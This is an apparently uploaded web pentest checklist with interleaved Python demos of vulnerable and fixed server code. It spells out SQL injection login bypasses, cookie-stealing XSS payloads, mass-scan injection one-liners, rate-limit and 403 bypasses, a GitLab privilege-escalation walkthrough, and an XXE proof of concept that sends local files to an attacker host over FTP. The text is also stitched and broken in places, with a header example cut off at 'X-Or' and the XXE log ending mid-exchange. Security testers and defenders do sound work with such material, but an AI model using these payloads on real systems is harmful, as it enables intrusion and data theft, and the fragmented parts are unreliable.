Web Pentest Checklist

The document outlines various testing categories and methodologies for web application security, including fingerprinting, network testing, application mapping, and auditing. It details specific tests for vulnerabilities such as SQL injection, XSS, CSRF, and session management issues, as well as techniques for parameter tampering and privilege escalation. Additionally, it emphasizes the importance of secure coding practices and the need for thorough testing to identify and mitigate potential security risks.

Uploaded by xemamix981

Category

- Fingerprinting Application
- Network Testing
- Application Mapping
- Application Component Audit
- Audit Session management
- Audit Registration
- Audit Authentication
- Error codes Testing
- Post login account information testing / Testing My Account information
- Forgot Password Testing
- Contact us / Feedback Form Testing
- Product Purchase Testing
- Flight, Railway, Hotel, Cab etc. Booking Testing
- Cross Site Scripting (XSS)
- SQL Injection
- Open Redirection
- Host header attack
- SAP Application Testing
- ASP.NET website testing
- CSRF token testing
- XML Injection Testing
- Banking Application Auditing
- Web Services testing
- Automated Scanners
- CAPTCHA Testing
- Other Testcases
- Find secrets using Burp Extension
- Use GF patterns to identify potential input points
- Jales Scan
- Making Favicon.ico based Recon Great again!
- Find secrets on Github
- HTTP parameter discovery suite
- Broken Link Hijacking
- Web Hacker's Weapons / A collection of cool tools used by Web hackers. Happy hacking, Happy bug-hunting
- The Bug Hunter's Methodology (TBHM)
- SSRF/LFI
Activity

Bruteforce sub domains

Directory enumeration via:
- Dirb
- Gobuster
- BurpSuite
- ZAP Proxy

Identify the underlying web client and server technology

Uncover HTTP services running on ports other than 80 and 443

Leaked info

Use https://dorks.faisalahmed.me for Google dorking


Find sensitive information through keywords after crawling the entire website. Keywords such as: password, admin, http, todo

a. Search for http:// to find insecure endpoints in the application
b. Search for keywords like admin, todo etc. to find interesting stuff
c. Search for both http:// & https:// to find hidden endpoints in JS files
Test for ping
Use Censys

DNS testing -
- Zone transfer
- Missing Certification Authority Authorization (CAA) Record
- Missing DNSSEC
Nessus scan
Banner disclosure of services other than 80 and 443.

Find all web servers using Nmap

UDP proto scanner


Generate site structure

Identify known vulnerabilities in the web/app server

SSL/TLS certificate testing


Identify the actual session cookie among the bulk of cookies set by the application.
Decode cookies using standard decodings such as Base64, hex and URL encoding.
Modify the session token value by one bit/byte at a time, resubmit, and repeat for every position of the token. This reduces the work needed to identify which part of the token is actually validated by the server and which part is not.
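The decode-and-flip procedure above in Python, as an added example that is not part of the original checklist. The application side (issue_token / check_token_*) is a constructed stand-in whose weak checker only compares the first 8 of 16 signature bytes; the secret is a demo constant. unvalidated_positions is the tester side: it mutates each byte of the decoded token, re-encodes it and asks the server's check whether the mutated token is still accepted, which is how the dead (unvalidated) region shows up.

```python
import base64
import binascii
import hmac
from typing import Callable, List, Optional
from urllib.parse import unquote

# ---- constructed stand-in for the target application -----------------------
# Token layout: base64url("<user>:<role>:" + hex(sig)).  check_token_weak only
# compares the first 8 of the 16 signature bytes, so the remaining bytes are
# never validated; that is the kind of dead region the bit-flipping pass finds.
_SECRET = b"demo-secret-not-a-real-key"   # demo constant, not a real key

def _sign(payload: bytes) -> bytes:
    return hmac.new(_SECRET, payload, "sha256").digest()[:16]

def issue_token(user: str, role: str) -> str:
    payload = f"{user}:{role}".encode()
    raw = payload + b":" + binascii.hexlify(_sign(payload))
    return base64.urlsafe_b64encode(raw).decode()

def _parse(token: str):
    raw = base64.urlsafe_b64decode(token)
    payload, sig_hex = raw.rsplit(b":", 1)
    return payload, binascii.unhexlify(sig_hex)

def check_token_weak(token: str) -> bool:
    try:
        payload, sig = _parse(token)
    except (ValueError, binascii.Error):
        return False
    return hmac.compare_digest(sig[:8], _sign(payload)[:8])   # truncated compare

def check_token_fixed(token: str) -> bool:
    try:
        payload, sig = _parse(token)
    except (ValueError, binascii.Error):
        return False
    return hmac.compare_digest(sig, _sign(payload))            # full-length compare

# ---- tester side -------------------------------------------------------------
def decode_cookie(value: str) -> Optional[bytes]:
    """Peel the usual layers: URL-encoding, then hex, then base64url (padding
    repaired).  Returns the innermost bytes recovered, or None."""
    value = unquote(value)
    for decoder in (
        lambda s: binascii.unhexlify(s),
        lambda s: base64.urlsafe_b64decode(s + "=" * (-len(s) % 4)),
    ):
        try:
            return decoder(value)
        except (ValueError, binascii.Error):
            continue
    return None

def unvalidated_positions(token: str, oracle: Callable[[str], bool]) -> List[int]:
    """Mutate the decoded token one byte at a time (XOR 0x01, then 0x02, so a
    hex digit always gets at least one valid neighbour), re-encode, and ask the
    oracle (the server's session check) whether it still accepts the token.
    A position that survives mutation is not being validated."""
    raw = base64.urlsafe_b64decode(token)
    free = []
    for i in range(len(raw)):
        for mask in (0x01, 0x02):
            mutated = bytearray(raw)
            mutated[i] ^= mask
            if oracle(base64.urlsafe_b64encode(bytes(mutated)).decode()):
                free.append(i)
                break
    return free

if __name__ == "__main__":
    tok = issue_token("alice", "user")
    print("decoded:", decode_cookie(tok))
    print("bytes ignored by weak check:", unvalidated_positions(tok, check_token_weak))
    print("bytes ignored by fixed check:", unvalidated_positions(tok, check_token_fixed))
```

Against a live target the oracle is an HTTP request that replays the mutated cookie and reports whether the response is still the logged-in page; the positions it returns are the ones you can stop worrying about, and a non-empty list from a production application means the token is only partially checked.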
If self-registration is available and you can choose your username, log in with a series of similar usernames containing small variations between them, such as A, AA, AAA, AAAA, AAAB, AAAC, AABA, and so on. If other user-specific data is submitted at login or stored in user profiles (such as an e-mail address)
Token leakage via Referer header - Untrusted 3rd Party
Check for session cookies and cookie expiration date/time
Identify cookie domain scope
Check for HttpOnly flag in cookie
Check for Secure flag in cookie if the application is over SSL
Check for session fixation i.e. value of session cookie before and after
authentication
Password reset link token does not expire (insecure configurability)

Replay the session cookie from a different effective IP address or system to check whether the server binds the session to the original machine or not.

Old session does not expire

Check for concurrent login through different machine/IP

Check whether any user-pertaining information is stored in the cookie value. If yes, tamper with it using another user's data.
Check for duplicate registration / overwriting an existing user
Check for a weak password policy
Check for stored XSS in the username and account name fields during registration
Check for an insufficient email verification process
Weak registration implementation - allows disposable email addresses
Overwrite default web application pages by specially crafted username registrations:
=> After registration, does your profile link appear as something like www.chintan.com/chintan?
a. If so, enumerate default folders of the web application such as /images, /contact, /portfolio
b. Register using usernames such as images, contact, portfolio
c. Check whether those default folders have been overwritten by your profile link or not.
Username enumeration
Bypass authentication using various SQL injections in the username and password fields. Use combinations of the injections below:
chintan' --
chintan' #
chintan'/*
' or 1=1 --
' or 1=1 #
' or 1=1/*
') or '1'='1 --
') or ('1'='1 --
Auto-complete testing
Lack of password confirmation on:
- Change email address
- Change password
- Manage 2FA

CHECK 2FA Cheatsheet from the Resource Section


Is it possible to use resources without authentication?
Access violation
Check if user credentials are transmitted over SSL or not.
Weak login function - HTTP and HTTPS both are available.
Test the user account lockout mechanism against a bruteforce attack

Variation: if the server blocks rapid user requests, then try the time-throttle option in Intruder and repeat the process.

A. Bypass rate limiting by changing the User-Agent to a mobile user agent.
B. Bypass rate limiting by changing the User-Agent to an anonymous user agent.

Create a password wordlist using the cewl command -
https://www.hackingarticles.in/comprehensive-guide-on-cewl-tool/

cewl -m 12,20 -w ~/Desktop/chintan.txt chintan.com

Use the wordlist with the Transmute python file to create a complex wordlist for the bruteforce process. - https://github.com/eshork/transmute

OTP bypass via response manipulation (register, login or password reset)

403 bypass using an override header:

GET /admin HTTP/1.1
Host: web.com
-> 403 Forbidden

GET /anything HTTP/1.1
Host: web.com
X-Or

Test OAuth login functionality for open redirection

1) Use the Burp 'find' option to locate parameters such as url, red, redirect, redir, origin, dest, targetURL, checkout_URL etc.
2) Check the value of these parameters, which may contain a URL.
3) Check for open redirection in the OAuth functionality (redirect_uri).
4) Change the URL value to www.chintan.com and check whether it gets redirected or not.
5) Check whether the same secret code (authorization code) request can be used multiple times.
Generate custom pages such as /chintan.php, /chintan.aspx and identify the error page
Add multiple parameters in the same POST/GET request with different values and generate errors
Add [], ]] and [[ in cookie values and parameter values to create errors
Try to generate unusual error codes by giving input such as /~chintan/%s at the end of the website URL
Find parameter which uses active account user id. Try to tamper it in order
to change the details of other account.
Create a list of features that are pertaining to a user account only.
- Change Email
- Change Password
- Change account details (Name, Number, Address, etc.)

Try CSRF
Post login, change the email id to an already existing email id. Check whether it is validated on the server side or not. Does the application send a confirmation link to the new email address? What if the user does not confirm the link within some time frame?
Perform all file upload tests using extension tampering and file content modification.

Unsafe file upload -
- No antivirus
- No size limit
- File extension filter bypass

Want to bypass file upload restrictions? Add ' , . " after the file extension, like:
file.php' , file.php. , file.php"
Open profile picture in new tab and check the URL. Find email id/user id
info.

EXIF Geolocation Data Not Stripped From Uploaded Images.


Check account deletion option if application provides it and confirm that
via forgot password feature
Change email id, account id, user id parameter and try to bruteforce other
user's password
Check whether application re-authenticates for performing sensitive
operation for post authentication features
Privilege escalation

Steps To Reproduce:

1. Sign into gitlab app as some user (attacker)
2. Go to the active sessions settings tab and revoke all the sessions besides the current active one
3. Sign into gitlab app in another browser as administrator (admin)
4. Go to users admin section and impersonate attacker user
5. Update the active sessions tab as attacker and make sure the second session appeared there (this is the admin logged into your account)
6. Inspect the Revoke button and make sure you see the session ID there. Copy it. ████
7. Go to index page of gitlab as attacker (http://gitlab.bb/ in my case), I do not know why, but it is an important step
8. Clear attacker browser's cookie
9. Open the developer console as attacker and manually set _gitlab_session to the copied one with:

document.cookie = "_gitlab_session=█████";

10. Refresh the attacker's page and make sure you are now inside the impersonated session
11. Click Stop impersonating at the top-right corner as attacker and make sure you are now logged in as gitlab admin. ███

Impact

Every gitlab authenticated user can escalate his privileges to admin ones and gain complete access to all gitlab services, projects and abilities. All he needs to do is ask an admin to impersonate his account because something works badly there.

https://hackerone.com/reports/493324
Failure to invalidate session on logout and password reset
Check the forgot-password reset link/code for uniqueness
Check whether the reset link expires if it is not used by the user for a certain amount of time
Find the user account identification parameter and tamper with the id or parameter value to change another user's password
Check for a weak password policy
Weak password reset implementation - token is not invalidated after use
If the reset link has other params such as date and time then
a. Change the date and time value in order to make an expired reset link active and valid again.
Check whether security questions are asked
a. How many guesses are allowed? -> Is a lockout policy maintained or not?
Add only spaces in the new password and confirm password fields, then hit enter and see the result.
Does it display the old password on the same page after completion of the forgot-password flow?
Manipulate the email parameter in the reset request:
- No domain
- No TLD
- JSON table
- Separators
- Carbon copy
- Double parameter
Ask for two password reset links and use the older one from the user's email
Check whether the active session gets destroyed upon changing the password or not
Weak password reset implementation - password reset token sent over HTTP
Send continuous forgot-password requests to see whether it issues sequential tokens
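A reset-token lifecycle that passes the checks above (uniqueness, expiry, single use, the older of two links being dead, sessions destroyed on password change, the all-spaces password rejected), as an added example that is not part of the original checklist. PasswordResetService, its in-memory stores and the 15-minute TTL are assumptions for the example; the clock is injectable so the expiry can be exercised offline.

```python
import hashlib
import hmac
import secrets
import time
from typing import Callable, Dict, Tuple

class PasswordResetService:
    """Reset tokens: random, stored hashed, one live token per user (a newer
    request invalidates the older link), expiring, single-use; and every
    session of the user is revoked when the password actually changes."""
    TTL = 900  # seconds a reset link stays valid (assumed value)

    def __init__(self, now: Callable[[], float] = time.time) -> None:
        self._now = now
        self._tokens: Dict[str, Tuple[str, float]] = {}  # user -> (sha256(token), issued_at)
        self.sessions: Dict[str, str] = {}                # session_id -> user (demo store)
        self.passwords: Dict[str, str] = {}               # user -> password (demo store)

    def request_reset(self, user: str) -> str:
        """Issue a fresh token; only its hash is stored, so a database leak does
        not hand out live links.  Replaces any earlier token for the user."""
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._tokens[user] = (digest, self._now())
        return token   # goes into the e-mail link, never echoed in an HTTP response

    def consume(self, user: str, token: str, new_password: str) -> bool:
        rec = self._tokens.get(user)
        if rec is None:
            return False
        digest, issued = rec
        if self._now() - issued > self.TTL:
            del self._tokens[user]                      # expired: force a new request
            return False
        if not hmac.compare_digest(digest, hashlib.sha256(token.encode()).hexdigest()):
            return False                                # wrong or older link
        if not new_password.strip() or len(new_password) < 12:
            return False                                # rejects blanks / all spaces
        del self._tokens[user]                          # single use
        self.passwords[user] = new_password
        for sid in [s for s, u in self.sessions.items() if u == user]:
            del self.sessions[sid]                      # old sessions die with the old password
        return True

if __name__ == "__main__":
    svc = PasswordResetService()
    svc.sessions["old-session"] = "alice"
    first, second = svc.request_reset("alice"), svc.request_reset("alice")
    print("older link accepted:", svc.consume("alice", first, "correct horse battery"))
    print("newer link accepted:", svc.consume("alice", second, "correct horse battery"))
    print("sessions left:", svc.sessions)
```

The password store is a plain dict for the demo; a real service hashes passwords with a dedicated KDF. The checks the service makes (hash-only storage, newest-token-wins, TTL, single use, session revocation) are exactly the ones the reset tests on this page try to violate.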
Is CAPTCHA implemented on the contact-us form in order to restrict email flooding attacks?

Does it allow uploading a file to the server?

A. Buy Now
-> Tamper the product ID to purchase another high-value product at a low price
-> Tamper product data in order to increase the number of products at the same price
B. Gift / Voucher
-> Tamper the gift/voucher count in the request (if any) to increase/decrease the number of vouchers/gifts to be used
-> Tamper the gift/voucher value to increase/decrease the monetary value of the voucher (e.g. a $100 voucher is given; tamper the value to increase or decrease the money)
-> Reuse a gift/voucher by using old gift values in parameter tampering.
-> Check the uniqueness of the gift/voucher parameter and try guessing other gift/voucher codes.
-> Use the parameter pollution technique to add the same voucher twice by adding the same parameter name and value again with & in the BurpSuite request.
C. Add/Delete Product from Cart
-> Tamper the user id to delete products from another user's cart.
-> Tamper the cart id to add/delete products from another user's cart.
-> Identify the cart id/user id for the cart feature to view the items added from another user's account.
D. Address
-> Tamper the BurpSuite request to change another user's shipping address to yours.
-> Try stored XSS by adding an XSS vector in the shipping address.
-> Use the parameter pollution technique to add two shipping addresses instead of one, trying to manipulate the application into sending the same item to two shipping addresses.
E. Place Order
-> Tamper the payment options parameter to change the payment method. E.g. some items cannot be ordered for cash on delivery, but tampering the request parameters from the debit/credit/paypal/netbanking option to cash on delivery may allow you to place an order for that item.
-> Tamper the amount value for payment manipulation in each main and sub request and response.
-> Check whether the CVV is sent in cleartext or not.
-> Check whether credit/debit card details are masked or not.
-> Check whether the application itself processes your card details and then performs the transaction, or calls a third-party payment processor to perform the transaction.
F. Track Order
-> Track another user's order by guessing the order tracking number
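The price-tampering and voucher parameter-pollution checks from sections A, B and E, shown from the server's side, as an added example that is not part of the original checklist. The catalogue, the SAVE50 voucher and the request bodies are constructed for the example. checkout_vulnerable trusts the client's price and honours every repeated voucher parameter; checkout_fixed recomputes the price from the catalogue, bounds the quantity, allows one voucher per order and records redemptions.

```python
from typing import Set
from urllib.parse import parse_qs

# Constructed catalogue and voucher table standing in for the shop's back end.
CATALOGUE = {"P-100": 10.00, "P-999": 999.00}
VOUCHERS = {"SAVE50": 50.00}
MAX_QTY = 10

def checkout_vulnerable(raw_body: str) -> float:
    """Trusts the client-supplied price and honours every voucher parameter,
    including duplicates (HTTP parameter pollution)."""
    q = parse_qs(raw_body)                # keeps all values of a repeated key
    total = float(q["price"][0]) * int(q["qty"][0])
    for code in q.get("voucher", []):
        total -= VOUCHERS.get(code, 0.0)
    return max(total, 0.0)

def checkout_fixed(raw_body: str, redeemed: Set[str]) -> float:
    """Price comes from the catalogue, quantity is bounded, at most one voucher
    per order, and a voucher can be redeemed only once (tracked in `redeemed`)."""
    q = parse_qs(raw_body)
    product = q.get("product", [""])[0]
    if product not in CATALOGUE:
        raise ValueError("unknown product")
    try:
        qty = int(q.get("qty", ["1"])[0])
    except ValueError:
        raise ValueError("bad quantity") from None
    if not 1 <= qty <= MAX_QTY:
        raise ValueError("bad quantity")
    total = CATALOGUE[product] * qty      # the client 'price' parameter is ignored
    vouchers = q.get("voucher", [])
    if len(vouchers) > 1:
        raise ValueError("only one voucher per order")
    for code in vouchers:
        if code not in VOUCHERS or code in redeemed:
            raise ValueError("invalid or already redeemed voucher")
        redeemed.add(code)
        total -= VOUCHERS[code]
    return max(total, 0.0)

if __name__ == "__main__":
    # Constructed tampered request: $999 item sent as $1, voucher supplied twice.
    body = "product=P-999&price=1.00&qty=1&voucher=SAVE50&voucher=SAVE50"
    print("vulnerable total:", checkout_vulnerable(body))
    try:
        checkout_fixed(body, set())
    except ValueError as err:
        print("fixed rejects:", err)
```

parse_qs is used deliberately: unlike a helper that silently keeps only the first or last duplicate, it shows every value a pollu­ted request carries, which is what the fixed handler needs in order to refuse the second voucher rather than accidentally accept one of them.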
A. Booking details
-> View/manage other users' booking details.
-> Check reservation status for other users / on behalf of other users.
B. Ticket/vouchers
-> View other users' vouchers/e-tickets from the PRINT option
-> Check whether sensitive data is passed in a GET request
-> If the e-ticket/voucher is sent by email then check for the email flooding attack.
C. Refund
-> View other users' refund status.
-> Refund more money than intended via parameter manipulation.
-> If refund tracking is allowed then obtain other users' refund tracking status.
D. Cancellation
-> Obtain a higher cancellation amount by modifying the amount value parameter.
E. Booking
-> Do a 1st-person booking and add 3 other persons at the same price
-> Hotel - book a normal room, then select a deluxe room at the same price

Locator: '';!--"<XSS>=&{()}

Try XSS using the XSStrike tool by Somdev Sangwan

python3.8 xsstrike.py --seeds domains.txt --crawl -l 3 --skip --skip-dom

Upload a file named '"><img src=x onerror=alert(document.domain)>.txt
Standard payloads for the URI and all inputs:
"><img src=x onerror=prompt(document.cookie);><!--
"><img src=x onerror=confirm(document.cookie);><!--
"><img src=x onerror=alert(document.cookie);><!--
If script tags are banned, use <h1> and other HTML tags
If the output is reflected inside JavaScript as the value of a variable, just use alert(1)
If " is filtered then use this payload:
/><img src=d onerror=confirm(/XSS/);>
Upload JavaScript using an image file
An unusual way to execute your JS payload is to change the method from POST to GET. It sometimes bypasses filters.

findomain -t bugskan.com -q | httpx -silent | anew | waybackurls | gf xss >> xssss ; grep "=" xssss | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace '"><script>confirm(1)</script>' | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)</script>" && echo -e "$host \033[0;31mVulnerable\033[0m"; done

cat urls.txt | gf xss | qsreplace '"><script>confirm(1)</script>' | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)</script>" && echo -e "$host \033[0;31mVulnerable\033[0m"; done

gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'

Tag attribute value
1. Input landed: <input type="text" name="state" value="INPUT_FROM_USER">
2. Payload to be inserted: " onfocus="alert(document.cookie)
Syntax-encoding payload:
%3cscript%3ealert(document.cookie)%3c/script%3e
ASP.NET / IE9 XSS filter evasion for htmlentities:
<%tag style="xss:expression(alert('XSS'))">
<%tag style="xss:expression(alert(123))"

Try a base64 payload

If the logout button just performs a redirection, use the old classic XSS payload
Polyglot payload

Use a pure JS payload that has worked on many popular websites if your input is reflected inside JavaScript.
Locator -
Test'" 123' "Þ}j%Ùÿ
'
"
'"
"'
;'
'"();=,%+-/**/ --
If parameter=static_integer_value then follow the method below:
if id=4, then try id=3+1 or id=6-2 (if the page loads the same way, it is vulnerable)
Use SQLmap to identify vulnerable parameters
1. Fill in the form in the browser GUI and submit it normally.
2. Go to the history tab in BurpSuite and find the relevant request.
3. Right click and select the option "Copy to file".
4. Save the file as anyname.txt
5. SQLmap command to run:
python sqlmap.py -r ~/Desktop/textsqli.txt --proxy="http://127.0.0.1:8080"
Search for SQL injection syntax errors using qsreplace and waybackurls:

grep "=" urls.txt | qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 ; grep -q -rn "syntax\|mysql" output 2>/dev/null && printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n"
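The authentication-bypass payloads listed under Audit Authentication and the id=3+1 arithmetic check above, run against a string-concatenated query and against its parameterised form, as an added example that is not part of the original checklist. The users table is constructed in-memory SQLite; which payloads succeed depends on the dialect's comment syntax (SQLite honours -- and /* but not #, and an unterminated /* runs to the end of the statement), which is why the checklist says to try them in combination.

```python
import sqlite3

# Constructed in-memory users table standing in for the target's database.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("chintan", "correct horse"), ("admin", "hunter2")])
    db.commit()
    return db

def login_vulnerable(db, username: str, password: str):
    """String-concatenated query: the pattern the checklist payloads target.
    Returns the username the query 'authenticated', or None."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None            # the payload broke the query rather than bypassing it
    return row[0] if row else None

def login_fixed(db, username: str, password: str):
    """Parameterised: the payload is compared as a literal string."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None

AUTH_BYPASS_PAYLOADS = [
    "chintan' --", "chintan' #", "chintan'/*",
    "' or 1=1 --", "' or 1=1 #", "' or 1=1/*",
    "') or '1'='1 --", "') or ('1'='1 --",
]

def try_bypasses(login) -> dict:
    """Run every payload as the username with a wrong password and record who
    the application thinks logged in (None = rejected or query error)."""
    db = make_db()
    return {p: login(db, p, "wrong-password") for p in AUTH_BYPASS_PAYLOADS}

# ---- the id=3+1 check for numeric parameters --------------------------------
def lookup_vulnerable(db, id_param: str):
    row = db.execute(f"SELECT username FROM users WHERE id = {id_param}").fetchone()
    return row[0] if row else None

def lookup_fixed(db, id_param: str):
    try:
        uid = int(id_param)    # "1+1" is rejected before it reaches SQL
    except ValueError:
        return None
    row = db.execute("SELECT username FROM users WHERE id = ?", (uid,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    for payload, who in try_bypasses(login_vulnerable).items():
        print(f"{payload!r:24} -> {who}")
    db = make_db()
    print("id=2 :", lookup_vulnerable(db, "2"), " id=1+1 :", lookup_vulnerable(db, "1+1"))
```

The two parenthesised payloads fail here only because this query has no surrounding parentheses; they exist for queries of the form WHERE (username = '...' AND ...), which is why the list carries both shapes.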
Database Management System (DBMS) misconfiguration
Open redirect mass scan using Oralyzer

python3.8 oralyzer.py -f urls.txt

1) Use the Burp 'find' option to locate parameters such as url, red, redirect, redir, origin, redirect_uri, target etc.
2) Check the value of these parameters, which may contain a URL.
3) Change the URL value to www.chintan.com and check whether it gets redirected or not.
4) Give the URLs below in the web browser and check whether the application redirects to the external site (www.twitter.com in these examples) or not.

https://www.target.com/ÿ/www.twitter.com/
https://www.target.com//www.twitter.com/
https://www.target.com/ÿ/www.twitter.com/
https://www.target.com//www.twitter.com/

5) Bypass the filter using returnTo=///chintan.com/
6) Bypass the filter using returnTo=http:///chintan.com/

Insert a new header in the GET/POST request as follows:

X-Forwarded-Host: www.chintan.com

If the target application redirects to it (or builds links with it), it is vulnerable.

Capture any request, change the Host header to google.com and see whether it gets redirected or not.
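Why the ///chintan.com/ and http:///chintan.com/ bypasses in steps 5 and 6 work, and what a Host-header-driven reset link looks like on the server, as an added example that is not part of the original checklist. naive_is_local is the flawed check many applications use ("empty host, so it is a local path"); is_safe_redirect is the strict replacement. reset_link_vulnerable / reset_link_fixed show the Host header test: ALLOWED_HOSTS and the /reset path are assumptions for the example.

```python
from typing import Dict
from urllib.parse import urlparse

# Hosts this application is actually served on (assumed for the example).
ALLOWED_HOSTS = {"www.target.com", "target.com"}

def naive_is_local(target: str) -> bool:
    """Common flawed check: 'no host component, so it must stay on our site'.
    urlparse reports an empty netloc for ///chintan.com/ and http:///chintan.com/,
    yet browsers send the user to chintan.com for both."""
    return urlparse(target).netloc == ""

def is_safe_redirect(target: str) -> bool:
    """Accept only a plain in-site path: exactly one leading '/', no scheme,
    no host, no backslash (browsers treat it as '/'), no control characters."""
    if not target.startswith("/") or target.startswith("//"):
        return False
    if "\\" in target or any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return False
    parsed = urlparse(target)
    return parsed.scheme == "" and parsed.netloc == ""

def reset_link_vulnerable(headers: Dict[str, str], token: str) -> str:
    """Builds the e-mail link from attacker-controlled headers: the password
    reset token is delivered to whatever host the request named."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    return f"https://{host}/reset?token={token}"

def reset_link_fixed(headers: Dict[str, str], token: str) -> str:
    """Only the Host header is consulted, and only if it is on the allow-list."""
    host = headers.get("Host", "").split(":")[0].lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"unexpected Host header: {host!r}")
    return f"https://{host}/reset?token={token}"

if __name__ == "__main__":
    for t in ("/account", "///chintan.com/", "http:///chintan.com/",
              "/\\chintan.com", "//chintan.com"):
        print(f"{t!r:24} naive={naive_is_local(t)!s:5} safe={is_safe_redirect(t)}")
    hdrs = {"Host": "www.target.com", "X-Forwarded-Host": "www.chintan.com"}
    print(reset_link_vulnerable(hdrs, "tok"))
    print(reset_link_fixed(hdrs, "tok"))
```

The strict validator deliberately refuses anything that is not a single-slash path; if the application genuinely needs to redirect to other hosts, the right fix is an allow-list of full hosts compared after parsing, never a substring or prefix check on the raw parameter.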
SAP NetWeaver Application
1. From the default error page derive the hostname & system information
2. Do an Nmap scan and check for WebDAV methods on ports other than 80 & 443.

Check whether the ASP.NET ViewState parameter is encrypted (and MAC-protected) or not


Re-use an anti-CSRF token for a CSRF attack
Check whether the token is validated on the server side or not
Check whether the token is validated for its full length or only a partial length
Create a few dummy accounts and compare the CSRF tokens across them (a token that is accepted for another account is not bound to the session)
Bypass the CSRF token using two input fields of the same name for updating the user's information in the same HTML file
Convert the POST request to GET and remove _csrf (the anti-CSRF token) to bypass the CSRF protection.
Check whether the value you are trying to change is passed in multiple places such as cookies and HTTP headers along with the GET and POST request.
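A token validator that fails each of the checks above against a hardened one, as an added example that is not part of the original checklist. validate_weak collapses three findings from the list into one function (GET skips the check, a missing token passes, only a prefix is compared); CsrfGuard binds a token to a session, compares it in full and in constant time, and never accepts a state change over GET. The class name and session-id strings are assumptions for the example.

```python
import hmac
import secrets
from typing import Dict, Optional

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}

class CsrfGuard:
    """One random token per session, compared in full and in constant time,
    and only ever accepted on a state-changing method."""
    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}      # session_id -> token

    def issue(self, session_id: str) -> str:
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def validate(self, session_id: str, method: str, submitted: Optional[str]) -> bool:
        if method.upper() not in STATE_CHANGING:
            return False        # a state change over GET is refused outright
        expected = self._tokens.get(session_id)
        if expected is None or not isinstance(submitted, str):
            return False        # unknown session, or token missing from the request
        return hmac.compare_digest(expected, submitted)

def validate_weak(expected: str, method: str, submitted: Optional[str]) -> bool:
    """Reproduces three findings from the checklist in one function: GET skips
    the check, a missing token passes, and only a prefix is compared."""
    if method.upper() == "GET" or submitted is None:
        return True
    return submitted[:8] == expected[:8]

if __name__ == "__main__":
    guard = CsrfGuard()
    mine, theirs = guard.issue("session-A"), guard.issue("session-B")
    print("own token on POST    :", guard.validate("session-A", "POST", mine))
    print("other account's token:", guard.validate("session-A", "POST", theirs))
    print("same request over GET:", guard.validate("session-A", "GET", mine))
    print("weak, token removed  :", validate_weak(mine, "POST", None))
    print("weak, prefix only    :", validate_weak(mine, "POST", mine[:8] + "AAAA"))
```

The "compare tokens across dummy accounts" test maps directly onto the per-session dictionary: a token issued to session-B is rejected for session-A, so an attacker cannot harvest a token from their own account and embed it in a form aimed at the victim.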
Proof of concept:
-----------------
1) XML External Entity Injection (CVE-2016-8526)
a) XXE in VisualRF Backup Sites

Login as any user role (including read-only/standard user)
Navigate to VisualRF > Floor Plans > Select 'View' under the 'Network' section.
Select a campus (e.g. Default Campus) > Select 'Edit' > Select action 'Export Floor Plans' > Ok

POST /visualrf/backup_sites HTTP/1.1
Host: <AirWaveHost>
[...]

xml=<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE x [<!ENTITY %25 foo SYSTEM "http://<AttackerHost>:1234/sectest.dtd">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><visualrf:sites xmlns:visualrf="http://www.airwave.com/"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; version="1">%26%65%78%66%69%6c%3b</visualrf:sites>

$ cat sectest.dtd
<!ENTITY % data SYSTEM "file:///<removed>">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://<Attacker>:2121/%data;'>">

$ python -m SimpleHTTPServer 1234

$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
$ ruby xxe-ftp-server.rb
FTP. New client connected
< USER anonymous
OTP testing
1. Check for OTP bypass
2. Check for OTP reuse
3. Check for increasing OTP validity via parameter tampering

Billing Activity Testing

1. Check if user 'A' can view the account statement for user 'B'
2. Check if user 'A' can view the transaction report for user 'B'
3. Check if user 'A' can view the summary report for user 'B'
4. Check if user 'A' can register for the monthly/weekly account statement via email on behalf of user 'B'
5. Check if user 'A' can update the existing email id of user 'B' in order to retrieve the monthly/weekly account summary
Deposit/Loan/Linked/External Account Checking
1. Check if user 'A' can view the deposit account summary of user 'B'
2. Check for account balance tampering for deposit accounts.
Tax Deduction Inquiry Testing
1. Check if user 'A' with customer id 'a' can see the tax deduction details of user 'B' by tampering with his/her customer id 'b'
2. Check parameter tampering for increasing and decreasing the interest rate, interest amount, and tax refund.
3. Check if user 'A' can download the TDS details of user 'B'.
Check if user 'A' can request a cheque book on behalf of user 'B'.
Fixed Deposit Account Testing
1. Check if it is possible for user 'A' to open an FD account on behalf of user 'B'.
2. Check if a user can open an FD account with more than the current account balance.
Stopping Payment on the basis of cheque/date range
1. Can user 'A' stop a payment of user 'B' via cheque number?
2. Can user 'A' stop payments on the basis of a date range for user 'B'?
Status Enquiry Testing
1. Can user 'A' view the status enquiry of user 'B'?
2. Can user 'A' modify the status enquiry of user 'B'?
